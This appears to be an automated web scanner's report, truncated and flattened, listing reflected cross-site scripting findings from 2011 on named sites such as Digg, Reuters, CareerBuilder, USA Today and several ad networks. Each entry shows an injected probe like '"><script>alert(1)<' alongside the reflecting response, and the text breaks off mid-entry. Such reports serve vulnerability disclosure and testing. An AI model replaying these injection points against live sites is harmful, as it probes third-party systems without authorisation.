GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 33240 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /submit |
GET /submit%00669e1"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:30 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=1698788 10.2.128.119 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18218 <!DOCTYPE html> <html xmlns:fb="http://www <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, break ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js?tid Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:21 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315097121 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 00:45:21 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 320 document.write("<"+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js?tid Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:21 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315097121 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 00:45:21 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 323 document.write("<"+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js?tid Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:21 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315097121 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 00:45:21 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 320 document.write("<"+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=851&ct=REUTERS Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Connection: close Date: Sun, 04 Sep 2011 00:44:44 GMT Pragma: no-cache Content-Type: application/x-javascript Expires: Sun, 04 Sep 2011 00:44:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 88 // Error: Unknown old section REUTERS_INVESTING659dc<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=851&ct=REUTERS Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Connection: close Date: Sun, 04 Sep 2011 00:44:44 GMT Pragma: no-cache Content-Type: application/x-javascript Expires: Sun, 04 Sep 2011 00:44:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 69 // Error: Unknown parameter 3a25e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=851&ct=REUTERS Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Connection: close Date: Sun, 04 Sep 2011 00:44:44 GMT Pragma: no-cache Content-Type: application/x-javascript Expires: Sun, 04 Sep 2011 00:44:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 87 // Error: Site 851 has no section NEWS_MARKETS27fb8<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: rsi_segs_1000000 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 04 Sep 2011 00:42:21 GMT Cache-Control: max-age=86400, private Expires: Mon, 05 Sep 2011 00:42:21 GMT X-Proc-ms: 0 Content-Type: application/javascript Vary: Accept-Encoding Date: Sun, 04 Sep 2011 00:42:21 GMT Content-Length: 128 /* * JavaScript include error: * The customer code "J06575A66A8<SCRIPT>ALERT(1)< */ |
Severity: | High |
Confidence: | Certain |
Host: | http://js.www.reuters.com |
Path: | /recommend/re/re |
GET /recommend/re/re?callback Host: js.www.reuters.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:57:56 GMT Server: Apache-Coyote/1.1 Expires: Sun, 04 Sep 2011 01:07:56 GMT max-age: 600000 Content-Type: text/javascript;charset Content-Length: 157 if (typeof Reuters.tns.updateRe |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /admeld_sync |
GET /admeld_sync?admeld_user Host: pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=e1c22076-53f3-4fd9 |
HTTP/1.0 200 OK Server: IM BidManager Date: Sun, 04 Sep 2011 01:05:16 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Sun, 04-Sep-2011 01:04:56 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 247 document.write('<img width="0" height="0" src="http://tag.admeld ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /2/nbc.com/ac@Bottom3 |
GET /2/nbc.com9782a"><script>alert(1)< Host: premium.mookie1.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:50:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 338 Content-Type: text/html <A HREF="http://premium ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /2/nbc.com/ac@Bottom3 |
GET /2/nbc.com/ac@Bottom3a684b"><script>alert(1)< Host: premium.mookie1.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:50:42 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 329 Content-Type: text/html <A HREF="http://premium ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=75258"><script>alert(1)< Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=2925993182975414771 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 04 Sep 2011 01:06:01 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=4 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=2925993182975414771 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:02 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 04 Sep 2011 01:06:01 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rtq.careerbuilder |
Path: | /RTQ/jobstream.aspx |
GET /RTQ/jobstream.aspx?lr Host: rtq.careerbuilder.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: REBEL1 Date: Sun, 04 Sep 2011 00:58:11 GMT Connection: close Content-Length: 6632 // declaration var cb_jobstream_title; var cb_jobstream_title_bg var cb_jobstream_title_font var cb_jobstream_border; var cb_jobstream_width; var cb_jobstream_height; var cb_jobstream_main_bgco ...[SNIP]... <input type="hidden" name="lr" value="CBMC_SB69f59';alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rtq.careerbuilder |
Path: | /RTQ/jobstream.aspx |
GET /RTQ/jobstream.aspx?lr Host: rtq.careerbuilder.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: REBEL52 Date: Sun, 04 Sep 2011 00:58:14 GMT Connection: close Content-Length: 6632 // declaration var cb_jobstream_title; var cb_jobstream_title_bg var cb_jobstream_title_font var cb_jobstream_border; var cb_jobstream_width; var cb_jobstream_height; var cb_jobstream_main_bgco ...[SNIP]... <input type="hidden" name="siteid=" value="MC_SB_jbstrm75175';alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_lastvisit=1315096975071 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449799883; path=/ Cache-Control: private Content-Length: 43049 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm6l3pluckcom Set-Cookie: SiteLifeHost=gnvm6l3 Date: Sun, 04 Sep 2011 00:45:19 GMT Connection: close plcb041775<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_lastvisit=1315096975071 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449799883; path=/ Cache-Control: private Content-Length: 34640 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm6l3pluckcom Set-Cookie: SiteLifeHost=gnvm6l3 Date: Sun, 04 Sep 2011 00:45:09 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... <div id=\"pluck_comments_66556 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_lastvisit=1315096975071 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449799883; path=/ Cache-Control: private Content-Length: 34978 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm6l3pluckcom Set-Cookie: SiteLifeHost=gnvm6l3 Date: Sun, 04 Sep 2011 00:44:59 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... _comments_83406\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://snas.nbcuni.com |
Path: | /snas/api/getRemoteD |
GET /snas/api/getRemoteD Host: snas.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:50:13 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Cache-Control: max-age=10 Expires: Sun, 04 Sep 2011 00:50:23 GMT Content-Length: 131 Content-Type: text/html __nbcsnasadops.doSCa |
Severity: | High |
Confidence: | Certain |
Host: | http://sprint.tt.omtrdc |
Path: | /m2/sprint/mbox/standard |
GET /m2/sprint/mbox/standard Host: sprint.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.sprint.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315097027971 Content-Type: text/javascript Content-Length: 220 Date: Sun, 04 Sep 2011 00:46:21 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /reuters/trc/2/json |
GET /reuters/trc/2/json?tim Host: trc.taboolasyndication Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/1.0.0 Date: Sun, 04 Sep 2011 00:52:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: policyref="http://trc Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: taboola_session_id=v1 Set-Cookie: JSESSIONID=.prod2-f6;Path Set-Cookie: taboola_wv=;Path=/reuters Content-Length: 3988 TRC.callbacks.recomm ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /Jobseeker/Jobs |
GET /Jobseeker/Jobs Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 183016 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ Set-Cookie: jobresults.aspx:mxdl41=pg X-Powered-By: ASP.NET X-PBY: BEARWEB49 Date: Sun, 04 Sep 2011 01:25:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... 'Close'; var sj_isSiteDown = false; var sj_loginUrl = 'http://www.careerbuilder var sj_userAuthStatus = 'Unknown'; var sj_saveJobAjaxPageUrl = 'http://www.careerbuilder </script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.idg.com |
Path: | /www/rd.nsf/rd |
GET /www7f740"%3b4cc57824ccb/rd.nsf/rd HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Sun, 04 Sep 2011 01:26:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5080 Cache-control: no-cache <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.idg.com |
Path: | /www/rd.nsf/rd |
GET /www/rd.nsf/rd752f0"%3b515516fa31a HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Sun, 04 Sep 2011 01:26:34 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5080 Cache-control: no-cache <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.idg.com |
Path: | /www/rd.nsf/rd |
GET /www/rd.nsf/rd?66e21"-alert(1)- Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Sun, 04 Sep 2011 01:26:22 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5093 Cache-control: no-cache <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.linkedin.com |
Path: | /countserv/count/share |
GET /countserv/count/share Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bcookie="v=1&e6907e29 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Sun, 04 Sep 2011 00:45:54 GMT Content-Length: 182 IN.Tags.Share.handleCount |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nbcudigit |
Path: | /hosted/util/getRemo |
GET /hosted/util/getRemo Host: www.nbcudigitaladops.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: xa=n |
HTTP/1.1 200 OK Server: Apache Content-Length: 152 Content-Type: application/javascript ETag: "15f491-44-4aacd3f4ef780" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Expires: Sun, 04 Sep 2011 00:52:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 00:52:42 GMT Connection: close __nbcadops_xasis |
Severity: | High |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: www.reuters.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
